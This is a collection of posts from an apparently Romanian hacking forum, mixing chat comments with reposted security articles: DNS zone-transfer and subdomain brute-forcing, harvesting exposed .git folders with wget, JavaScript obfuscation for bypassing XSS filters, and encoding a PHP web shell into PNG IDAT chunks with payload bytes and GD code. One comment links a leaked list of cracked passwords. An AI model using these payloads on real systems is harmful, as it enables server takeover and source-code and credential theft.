alien

Presupun totusi ca au fost oameni care si-au dat seama ca e 4S si nu 5, dar au fost scosi din video.

Cine are cont pe docs vedeti ca e up tot defcon20 (18gb)

Orice BSOD genereaza un minidump. Poti sa faci ""debug"" pe el si sa afli mai multe informatii. De obicei minidump-urile sunt salvate in C:/windows/minidump/ si o sa ai nevoie de debugging tools de la microsoft ca sa le deschizi. Cauta pe g00gle mai multe informatii. Bafta!

Pune si tu sursa de unde le ai. Sunt de la raposatii HH.

NetSleuth features: A realtime overview of devices connected to a network. No requirement for hardware or reconfiguration of networks. “Silent portscanning” and undetectable network monitoring. Offline analysis of pcap files to aid in intrusion response and network forensics. Automatic identification of a vast array of device types, including smartphones, tablets, gaming consoles, printers, routers, desktops and more Silent PortScanning Many network devices broadcast various information across the network. Often this is for ‘zero configuration’ style services, for example Apple’s Bonjour protocol. This information often contains information on the machine, and services running on that device – great information for fingerprinting. For this reason, it is possible to obtain port scanning style information completely silently. NetSleuth also does not put the network adapters into promiscuous mode, mitigating some techniques to detect sniffing network adapters. No Configuration NetSleuth is a 100% software solution, and will monitor traffic on switched or hubbed networks. Any Windows machine on the network can be used. Offline Analysis A network capture from any network with consumer devices will contain a huge amount of rich broadcast traffic for analysis. NetSleuth can analyse and extract this data from .pcap files from Snort, Wireshark or other tools. It can also analyse data intercepted by Kismet (the .pcapdump) files. Protocols NetSleuth can extract, analyse and fingerprint devices from the following protocols Apple MDNS / Bonjour SMB / CIFS / NetBios DHCP (using the fingerbank.org resource) SSDP (as used in Microsoft Zero Config) Download Windows version - Download NetSleuth | NetGrab Security Console version - NetSleuth Console | NetGrab Security Usage: python netsleuth.py -o <the name of a pcap file> python netsleuth.py -i <the name of a network adapter you want to sniff on – eg eth0>

La multi ani Andrei!

EARLY RELEASE DEF CON 20 VIDEO IS LIVE! We've got another treat for everybody. The good folks at Source of Knowledge slipped us a few of the presentation videos ahead of schedule, so here they are for your enjoyment. If you slept through the keynote, here's your chance to check it out. If you missed the whole show, here's a few solid reasons you should join us next year. Keynote by General Keith Alexander - Shared Values, Shared Responsibility FX and Greg - Hacking Routers https://media.defcon.org/dc-20/video/DEF%20CON%2020%20Hacking%20Conference%20Presentation%20By%20-%20FX%20and%20Greg%20-%20Hacking%20[Redacted]%20Routers%20-%20Slides.m4v Zack Fasel - Owned in 60 Seconds Closing Ceremonies SLIDES http://defcon.org/html/links/dc-archives/dc-20-archive.html Source: http://defcon.org/ Postati aici daca mai gasiti alte video-uri de la prezentarile defcon20.

The SQL Injection Knowledge Base

DNS is a naming system for computers that converts human readable domain names e.g. (infosecinstitute.com) into computer readable IP-addresses. However some security vulnerabilities exist due to misconfigured DNS nameservers that can lead to information disclosure about the domain. This forms an important step of the Information Gathering stage during a Penetration test or Vulnerability assessment. In this article we will look at the following areas.. DNS Basics Resource records and the Zone file DNS Lookup and Reverse DNS Lookup Understanding Wildcard Entries DNS Zone transfer DNS Bruteforcing Chapters 1 and 2 you can read in the link below to understand the basics of DNS. 3) DNS Lookup and Reverse DNS Lookup DNS Lookup - Let’s perform a DNS Lookup ourselves for infosecinstitute.com. We will do this by traversing the entire DNS hierarchy from the root servers to the top level domain. Open up the terminal in Backtrack (you can use your own favourite distro) and type in “dig”. You will get something as shown in the figure below. What we get is a list of the Root DNS Servers. Let’s use this root DNS server to query infosecinstitute.com. We do this as shown in the figure below What we get is a list of authoritative name servers for the com domain. Notice the dot (.) at the end, this is what makes this a fully qualified domain name (FQDN). Let’s use these Name servers to query again. Now we get the list of authoritative name servers for infosecinstitute.com (which is ns1.pairnic.com and ns2.pairnic.com). Now we need to query these name servers to get the IP-address of Infosecinstitute.com And now in the Answer Section we can see that the Ip-address for infosecinstitute.com is 216.92.251.5. SUCCESS ! Reverse DNS Lookup - Performing Reverse DNS Lookup converts an IP-address into it’s hostname. For this we need to write the IP-address in reverse order (for e.g. 192.168.1.1 will be 1.1.168.192) and then append “.in-addr.arpa.” to it. Next we need to make a query for a PTR Record using DIG. Let’s make a DNS PTR query for 216.92.251.5, the command here would be “dig 5.251.92.216.in-addr.arpa PTR” As we can clearly see, this IP-address resolves to infosecinstitute.com. As Simple as that! 4) Understanding Wildcard Entries WildCard – A wildcard entry is used to provide responses for subdomains that do not exist. For e.g. let’s say we have a domain example.com. If we set a wildcard record for *.example.com and give it the value example.com then the requests for all the non-existent subdomains of example.com (for e.g. abcd.example , blah.example.com) will point to example.com. In the information gathering stage of a penetration test of a website, it is important to identify the subdomains and the IP-addresses corresponding to them. Introducing a Wildcard feature reduces this to a small extent. Bypassing Wildcard entries – In case wildcard entries are set on a particular domain, they could be bypassed to reveal information about it’s subdomains. This is done by brute forcing the subdomains. We have a wordlist in which we contain the subdomain names we want to test the domain against. Then we do a ping of all these subdomains, if these domains resolve to an IP-address different than the host IP-address, then we can very surely say that this subdomain actually exists. However before performing a brute force it would be better to actually check if Wildcard entries are enabled or not. For that we can ping some random subdomains for e.g. 434234.example.com and see if it’s IP-address is the same as the host IP-address(in this case example.com). If this is the case for some random subdomains, then we can clearly say that Wildcard entries are enabled for this domain. We will perform a demo of this in the coming section. 5)DNS Zone Transfer - We saw in the previous exercises that every domain has some authoritative name servers associated with it. For eg in the case of google.com, the nameservers were ns1.google.com to ns4.google.com .These Nameservers are used for handling requests related to the domain google.com. Let’s say we have a domain example.com and it has it’s two nameservers as ns1.example.com and ns2.example.com. Usually a big organization will have more than one nameservers so that if one goes down for some time, the other one is ready to back it up and handle the requests. Usually one of these servers will be the Master server and the other one will be the slave server. Hence to stay in sync with each other, the slave server must query the Master server and fetch the latest records after a specific period of time. The Master server will provide the slave server with all the information it has. This is basically what is called a “Zone Transfer”. It’s like asking the nameserver “Give me everything you have”. A properly configured nameserver should only be allowed to serve requests of Zone transfer from other Nameservers of the same domain. However if the server is not configured properly it will serve all requests of Zone transfer made to it without checking the querying client. This leads to leakage of valuable information. DNS Zone transfer is sometimes referred through it’s opcode mnemonic AXFR. Let’s see an example of a Zone transfer. We will be using the tool Fierce present by default in Backtrack. Fierce is one of the best tools available out there for DNS Analysis. Type in the following command “perl fierce.pl -dns searching-eye.com”. We get something as shown in the figure below. What fierce does is that it first finds out the nameservers for the domain. It then checks to see if they allow zone transfers. Since one of the nameservers is not properly configured, it allows zone transfer and what we see is a dump of all the information (records,subdomains etc). Why is Zone transfer a Security Issue? A zone transfer reveals a lot of information about the domain. This forms a very important part of the “Information Gathering” stage during a penetration test, vulnerability assessment etc. We can figure out a lot of things by looking at the dump.For e.g. we can find different subdomains. Some of them might be running on different servers.Those server may not be fully patched and hence be vulnerable.From this point, we can start thinking about Metasploit ,Nessus,Nmap etc and do a full vulnerability assessment of the domain. Hence this kind of information increases our attack vector by a fair amount, an amount which cannot be ignored. To protect your nameservers from leaking valuable information, one must allow zone transfer to other nameservers of the same domain only. For e.g. ns1.example.com should allow zone transfer to ns2.example.com only and discard all the other requests. 6)DNS Bruteforcing -DNS Zone transfers may not work all the time. In fact, it will not work most of the time. Most of the DNS servers are properly configured and do not allow zone transfers to every client. Well what do we do then ? Simple answer, the same thing we do when nothing works, BRUTE FORCE it ! Basically we have a wordlist containing a huge list of hosts. We first check for wildcard entries by checking if a random subdomain for e.g. 132qdssac.example.com resolves to the same IP-address as example.com .If this is the case, we know Wildcard entries are set. We then query the domain by using each of the word in our wordlist. For e.g. if one of the entries in the wordlist file is “ads” , then we make a query for ads.example.com. If it resolves to a different IP-address then we are sure that this subdomain actually exists. Hence we now have information about the name of subdomain and it’s IP-address. If wildcard entries are not set , we do the same thing and see if we get response from any subdomain we query. If we get a response back, we could be sure that the subdomain actually exists. In the end what we get is a bunch of information about the domain. Let’s see this through a demo. We will again use the tool “Fierce”. Fierce is a very handy tool for DNS Analysis and it is something everyone should have in their armory. Fierce will first check if Zone transfers are allowed or not, if zone transfers are allowed, it will dump all the information and exit happily, otherwise it will brute force it. We need to supply Fierce with a wordlist containing a list of all the possible subdomain names (for e.g. hosts,ads,contracts). Fierce comes with an inbuilt wordlist file “hosts.txt” and we will be using the same for our demo. As we can see, Fierce dumps out information about the subdomains of google.com CONCLUSION DNS protocol is a very critical component of the Internet as it resolves IP-address into hostnames and makes life a lot easier for us. However, if the nameservers are not properly configured they might leak out the whole DNS server database to any malicious hacker. Even if the servers are properly configured, they can be brute forced to leak information about their mail servers, IP addresses, etc. It is therefore important to properly configure your DNS servers and be aware of the security issues with DNS. Credits: InfoSec Resources – DNS Hacking (Beginner to Advanced)

GJ petru program. Eu prefer totusi nmap http://www.nmap.org/svn/scripts/http-enum.nse O lista cu cele mai folosite subdirectoare web http-fingerprints.lua

Vodafone customers are exposed to phone tapping. THC reveals secrets of Vodafone's insecure Femto equipment. Crappy and braindead design of femto puts customers at risk. Problem can not be fixed by hardening femto. Redesign (e.g. removing mini RNC from the femto) is the only secure way forward. Vodafone urget to improve security. 3G/UMTS/WCDMA has such nice security features. Shame to see how one operator can fuck it up so badly... vodafone - THC Wiki Nu cred ca Orange sau Cosmote sunt diferite.

Ms Nytro. Apropo o alta lista cu masini virtuale "exploatabile" gasiti aici: boot2root.info (de la g0tmi1k)

Release notes a gasit cineva?

Transform any javascript code into an equivalent sequence of ()[]{}!+ characters. Try it here Hieroglyphy | Patricio Palladino Source code: https://github.com/alcuadrado/hieroglyphy Alphabet Many alphabets could do the job, but just for fun, I tried to keep it as small as possible, using only the following characters: [ and ] to access array elements, objects properties, get numbers and cast elements to strings. ( and ) to call functions and avoid parsing errors. + to append strings, sum and cast elements to numbers. ! to cast elements to booleans. { and } to get NaN and the infamous string "[object Object]" Numbers To start our journey to the world of brackets, lets represent the numbers with our new alphabet. 0 is easily obtained by casting an empty array like this +[]. In a similar way, we can cast the empty array to boolean to get true, and then to 1 with +!![]. Those numbers, along with + would be enough to get every natural. But if we take advantage of JavaScript coercion of types, we can reduce the size of the sequence of the numbers in two ways. First, if we add a number and a boolean, both operands would be casted to numbers. So instead of using sums of ones to generate larger values, we can add just a 1 and a sequence of trues (we can use more than one true at a time beacuse addition is left-to-right assosiative). For instance, here is 4: !+[]+!![]+!![]+!![]. The second idea is to get strings representing large numbers and cast them in order to get a shorter sequence of symbols. Once we obtained all the possible digits like we did above with 4, we can get the desired string by adding the first digit to [] (to make it a character), and combinig all of them with + (with the necessary parens). Once again, the left-to-right assosiativite would save us lots of chars. Finally, we only need to cast that. Doing this, 12 would look like this: +((+!![]+[])+(!+[]+!![])). The second idea is to reuse what we’ve done above in order to get a shorter sequence of symbols. The main purpose of doing this is to represent bigger numbers without the need to sum 1 each time to get to our number, so instead we get it’s string representation and cast it to number. For example, representing 12 adding ones would be: (!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]), but by resuing 1 and 2 we can be represen it like this: +((+!![]+[])+(!+[]+!![])). Here, we have casted the first digit to string, added the second, and then, converted everything to a number. Speaking in terms of code, on the first case we did a simple sum: (1+1+1+1+1+1+1+1+1+1+1+1); and on the second one we concatenated two strings and casted them into a number like this: +("1"+2). Having said that, here is a table of all the possible digits: 0 +[] 1 +!![] 2 !+[]+!![] 3 !+[]+!![]+!![] 4 !+[]+!![]+!![]+!![] 5 !+[]+!![]+!![]+!![]+!![] 6 !+[]+!![]+!![]+!![]+!![]+!![] 7 !+[]+!![]+!![]+!![]+!![]+!![]+!![] 8 !+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![] 9 !+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![] Base elements and strings Now that we have numbers, lets go for more interesting elements from which we can obtain characters: true as we have already seen, can be obtained from !![] false from ![] undefined by accessing to non-existing element to an array: [][+[]] NaN is the result of trying to cast an object to number: +{} "[object Object]" with {}+[] Casting them to string (when necessary) and accessing those like arrays will give us single characters, from which we can even get more strings! These are (the space), "[", "]", "a", "b", "c", "d", "e", "f", "i", "j", "l", "n", "N", "o", "O", "r", "s", "t" and "u". By combining them with numbers we can get "1e100" and "1e1000", which when casted to numbers would result in 1e+100 and Infinity. And by casting them back to strings we can manage to get "y", "I" and "+". Gathering functions from available characters By combining those characters, we can only get these JavaScript functions and type names: "call", "concat", "constructor", "join", "slice" and "sort". Playing with our alphabet and these strings, we can get the following functions: Function from array["sort"]["constructor"] Array from array["constructor"] Bolean from false["constructor"] Number from 0["constructor"] Object fom {}["constructor"] String fom string["constructor"] Function.prototype.call from f["call"] String.prototype.concat from string["concat"] Array.prototype.join from array["join"] Array.prototype.slice from array["slice"] Array.prototype.sort from array["sort"] Unluckily, none of these functions would give us new characters, but don’t loose your hope yet! Exploting the DOM for fun and characters If we sacrifice some portabilty and constraint the scripts to webpages, we can take for granted that DOM elements would be available, and get the remaining characters. One interesting function that becames available is window.unescape which would give us all the ASCII characters by calling window.unescape("%" + HEXA_ASCII_VAL). All we are missing to get unescape is the "p" character. So once again we make a trade-off, sacrificing some more portability to get it. If we know that we are in a webpage served over HTTP or HTTPS we can asume that by casting window.location to string, and getting its third character we would obtain the precious "p". But how can we obtain the window.location object if we don’t have access to window yet? Luckly JavaScript, being so premissive, would give that object by doing this: Function("return location")() And with location now we can have three more characters "h", "p", "/", escape and unescape functions! If we could get the character "%" we would be able to get the rest by calling unescape("%" + HEXA_ASCII_VALUE). Luckly, escaping "[" yields the string "%5B, and from that, we can obtain the percentage sign. Now, we can reach any ASCII character like this: [][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+[]]+([][+[]]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+([]+[][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+[]+!![]+!![]]+({}+[])[+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][+[]]+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+([][+[]]+[])[+!![]])())[!+[]+!![]+!![]]+(!![]+[])[!+[]+!![]+!![]])()([][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!+[]+!![]+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+([]+[][(![]+[])[+[]+!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+({}+[])[+!![]]+([][+[]]+[])[+!![]]+(![]+[])[+[]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+[]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][+[]]+[])[+[]]+(!![]+[])[+!![]]+([][+[]]+[])[+!![]]+({}+[])[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+[]+!![]+!![]]+({}+[])[+!![]]+({}+[])[!+[]+!+[]+!+[]+!+[]+!+[]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][+[]]+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+([][+[]]+[])[+!![]])())[!+[]+!![]+!![]]+(!![]+[])[!+[]+!![]+!![]])()(({}+[])[+[]])[+[]]+HEXA_VALUE) Finally, all we need to transform a script into symbols, is reading it as a string, encoding it in our alphabet, and use Function as eval. Hieroglyphy With the findings in this article, I’ve made a tool for encoding scripts, strings and numbers into this alphabet. It’s available at github, so feel free to fork and modify it. You can also try it online here. Room from improvement Both this article and Hieroglyphy are just proof of concepts, there is plenty of room from improvments: Once we were able to generate all ASCII characters, no effort was made to get the shortest representation of any of them. When targeting modern browsers only or node.js, btoa would be a great help yielding lots of characters in shorter sequences. Depending on the target, one may select a bigger alphabet for reducing the encoding size. If we know the domain where the script would be run, more characters can be graved from it. Credits: Bypassing XSS protection: Transform any javascript code into an equivalent sequence of ()[]{}!+ characters via reddit.com

Spre deosebire de alte soft-uri care dau crash cu division by 0 eu zic ca e foarte bun

When you pentest a website an it's ok to "make a lot of noise" you can use the nmap script at http-enum.nse , that basicaly uses another script http-fingerprints.lua to find any common folders on a system, bruteforce but works. This most of the time returs folders like admin, tmp and others, but the one in particular we will discuss right now is the /.git folder. Now we need to get the /.git folder. Using git clone to download the sources will fail, so since directory listing is turned on we can download it using wget. $ mkdir git-test $ cd git-test $ wget --mirror --include-directories=/.git http://www.target.com/.git That'll take some time, depending on the size of the repository. When it's all done, go into the folder that wget created and use git --reset: $ cd www.site.com $ git reset --hard HEAD is now at [...] Then look around - you have their entire codebase! $ ls db doc robots.txt scripts test Browse this for interesting scripts (like test scripts?), passwords, configuration details, deployment, addresses, and more! You just turned your blackbox pentest into a whitebox one, and maybe you got some passwords in the deal! You can also use "git log" to get commit messages, "git remote" to get a list of interesting servers, "git branch -a" to get a list of branches, etc. Why does this happen? When you clone a git repository, it creates a folder for git's metadata - .git - in the folder where you check it out. This is what lets you do a simple "git pull" to get new versions of your files, and can make deployment/upgrades a breeze. There are a few ways to prevent this: Remove the .git folder after you check it out Use a .htaccess file (or apache configuration file) to block access to .git Keep the .git folder one level up - in a folder that's not available to the Web server Use a framework - like Rails or .NET - where you don't give users access to the filesystem Finding this in an automated way You can quickly scan an entire network by using a command like: nmap -sS -PS80,81,443,8080,8081 -p80,81,443,8080,8081 --script=http-git <target> The output for an affected host will look something like: PORT STATE SERVICE 80/tcp open http | http-git: | Potential Git repository found at 206.220.193.152:80/.git/ (found 5 of 6 expected files) | Repository description: Unnamed repository; edit this file 'description' to name the... | Remote: https://github.com/skullspace/skullspace.ca.git |_ -> Source might be at https://github.com/skullspace/skullspace.ca Credits: SkullSecurity ? Blog Archive ? Using "Git Clone" to get Pwn3D

Foarte interesant e ca Mono e cam de 10 ori mai rapid decat Dalvik. Java se cam duce in jos. Am vazut ca au portat tot android-ul pe C# cu XobotOS. C# devine tot mai optimizat in ultima vreme.

Mi-am comandat si eu unu acum 5 min. Am vazut ca se poate pune si android pe el

The BackTrack Development team will be releasing an R3 revision of our Penetration Testing distribution in 2 weeks. This release focuses on bugfixes and over 50 new tool additions – making it the most potent revision yet. We have released a BT5 R3 preview in BlackHat Vegas for the enjoyment of conference attendees, which can be found in their delegate bags. The DVD contains a BT5 R3 Gnome, 32 bit edition – burnt as an ISO (as opposed to an image). We will be taking in our last bug reports and tool suggestions from the BH / Defcon crowds for our upcoming official release, which will be on August 13th, 2012. Current BT5 users can simply upgrade to the latest release using the regular update commands. More details will be released along with the full listing of new tools on the 13th of August. We hope you enjoy this fine release as much as we do! BackTrack 5 R3 Release - Aug 13th, 2012

Eu iti recomand google enterprise daca nu esti paranoic ca iti fura google datele. Era in jur de 5 usd pe luna parca

Si eu prefer ceva mai inchis la culoare, tema asta negru cu verde e faina. Oricum spor la treaba, asteptam cu interes noua tema.

@drealecs: nici eu nu mi-am gasit-o in lista aia LE: o lista cu parole decriptate aici: http://www.mediafire.com/?bq8bd5iojp50zci

If you carefully encode a web shell in an image you can bypass server-side filters and seemingly make shells materialize out of nowhere (and I’m not talking about encoding data in comments or metadata) – this post will show you how it’s possible to write PHP shells into PNG IDAT chunks using only GD. Exploiting a server misconfiguration or Local File Inclusion can be tricky if you cannot write code to the file system – In the past applications that allow image uploads have provided a limited way to upload code to the server via metadata or malformed images. Quite often however images are resized, rotated, stripped of their metadata or encoded into other file formats effectively destroying the web shell payload. PNG file format basics Within the PNG file format (we’ll focus on true-color PNG files rather than indexed) the IDAT chunk stores the pixel information. It’s in this chunk that we’ll store the PHP shell. For now we’ll assume that pixels are always stored as 3 bytes representing the RGB color channels. When a raw image is saved as a PNG each row of the image is filtered on a per byte basis and the row is prefixed with a number depicting the type of filter that’s been used (0×01 to 0×05), different rows can use different filters. The rationale behind this is to improve the compression ratio. Once all the rows have been filtered they are all compressed with the DEFLATE algorithm to form the IDAT chunk. So if we want to input data as a raw image and have it saved as a shell we need to defeat both the PNG line filters and the DEFLATE algorithm. It’s easier to work backwards so we’ll start with DEFLATE. Step 1. Compressing a string to form a shell Ideally we need to design a string that compresses to form a shell, this is not as hard as you might think but obviously our string can’t contain any repeated blocks of code (or they’ll be compressed). In fact, to prevent a shell from being compressed you have to design one that doesn’t have any repeated sub strings longer than 2 characters in length. This means we have to keep it short: <?=`$_GET[0]`;?> If only it were that simple Sadly, if you run DEFLATE over the above string you get a load of garbage out, the string hasn’t been compressed but the DEFLATE results don’t start on a byte boundary and are encoded using LSB rather than MSB. I won’t go into it in too much detail but you can read more on Pograph’s weblog It turns out the easiest shell to encode is in upper case: <?=$_GET[0]($_POST[1]);?> You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute. I’ve engineered the following string that DEFLATES to the above, the advantage of this string is that the first byte of the payload can be changed from 0×00 up to 0×04 and the compressed string will still remain readable – this is important for evading the PNG filters that will be encountered in the next phase of processing. 03a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310 Sadly you can’t just embed this in the initial raw image and have it spat out in the IDAT chunk as the PNG library filters the image rows first before it applies DEFLATE. Step 2. Bypassing the PNG line filters There are 5 different types of filters and the PNG encoder decides which one it wants to use for each line. The problem now is we need to construct a string that when passed to the filters results in the string in step 1 being generated. As long as our image only contains the 1 row payload (the rest of the image needs to be a constant color e.g. black) then the two filters you are likely to encounter are 1 and 3, to simplify things further if the payload remains in the top left of the image then we can write the reverse of the two filters as follows: // Reverse Filter 1 for ($i = 0; $i < $s; $i++); $p[$i+3] = ($p[$i+3] + $p[$i]) % 256; // Reverse Filter 3 for ($i = 0; $i < $s; $i++); $p[$i+3] = ($p[$i+3] + floor($p[$i] / 2)) % 256; If you encode the payload using just filter 3 the PNG encoder will try to encode it using filter 1, if you encode it using filter 1 the PNG encoder tries to use filter 0 – eventually you end up stuck in a loop. To control which filter the PNG encoder selects I encode the shell in step two with both the inverse of filter 3 and filter 1 and concatenate them, this forces the encoder to choose filter 3 for the payload and ensures that when the data in the raw image is encoded it is transformed into the code in step 2. This code then compresses into the web shell which is stored in the IDAT chunk. Using this method the following payload is created – filter 3 is in green, filter 1 in grey. Ironically using filters actually makes the payload larger. 0xa3, 0x9f, 0×67, 0xf7, 0xe, 0×93, 0x1b, 0×23, 0xbe, 0x2c, 0x8a, 0xd0, 0×80, 0xf9, 0xe1, 0xae, 0×22, 0xf6, 0xd9, 0×43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0×1, 0xdc, 0x5a, 0×1, 0xdc, 0xa3, 0x9f, 0×67, 0xa5, 0xbe, 0x5f, 0×76, 0×74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0×30, 0x6b, 0×88, 0x2d, 0×60, 0×65, 0x7d, 0×52, 0x9d, 0xad, 0×88, 0xa1, 0×66, 0×44, 0×50, 0×33 Step 3. Constructing the Raw Image When constructing the raw image that GD will encode into a PNG file it’s important that you place the payload in the first row of the image. It’s worth noting at this point that the payload I’ve provided above only works for small images (up to ~40px by ~40px) although it is possible to construct payloads for larger image sizes. Payloads need to be encoded as RGB byte sequences like so: $p = array(0xa3, 0x9f, 0x67, 0xf7, 0xe, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x1, 0xdc, 0x5a, 0x1, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33); $img = imagecreatetruecolor(32, 32); for ($y = 0; $y < sizeof($p); $y =+ 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $; imagesetpixel($img, round($y / 3), 0, $color); } imagepng($img); When the image is constructed it should appear a string of pixels in the top left corner on a black background: When the image is viewed with a hex editor you should be able to see the shell: If you want a background that’s not black it is possible, you may get away with filling in the background with data as long as the bytes (not pixels) within this data do not appear within the rest of the image. If they do the payload may be destroyed when the IDAT block is compressed – it may also cause other filters to be deployed by the encoder. Step 4. Bypassing image transforms The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations – PHP-GD contains two functions to do this imagecopyresized and imagecopyresampled. Imagecopyresampled transforms images by taking the average pixel value over a group of pixels meaning that to bypass this you need to encode the payload in a series of rectangles or squares. Imagecopyresized however transforms images by sampling every few pixels meaning that to bypass this function you actually only have to change a few pixels. Both images below contain the web shell when resized to ¹/?th of their original size. Some conclusions Placing shells in IDAT chunks has some big advantages and should bypass most data validation techniques where applications resize or re-encode uploaded images. You can even upload the above payloads as GIFs or JPEGs etc. as long as the final image is saved as a PNG. There are probably some better techniques you could use to hide the shell more convincingly and short of scanning each uploaded image for a shell there is probably not much you can do as a developer to stop it. I’d imagine that encoding a shell into a lossy format such as JPEG could be substantially harder – but probably not impossible. Sursa:Encoding Web Shells in PNG IDAT chunks | Web App Security

Codul sursa pentru noul model Galaxy S3 publicat de Samsung: http://opensource.samsung.com/reception/receptionSub.do?method=search&searchValue=I9300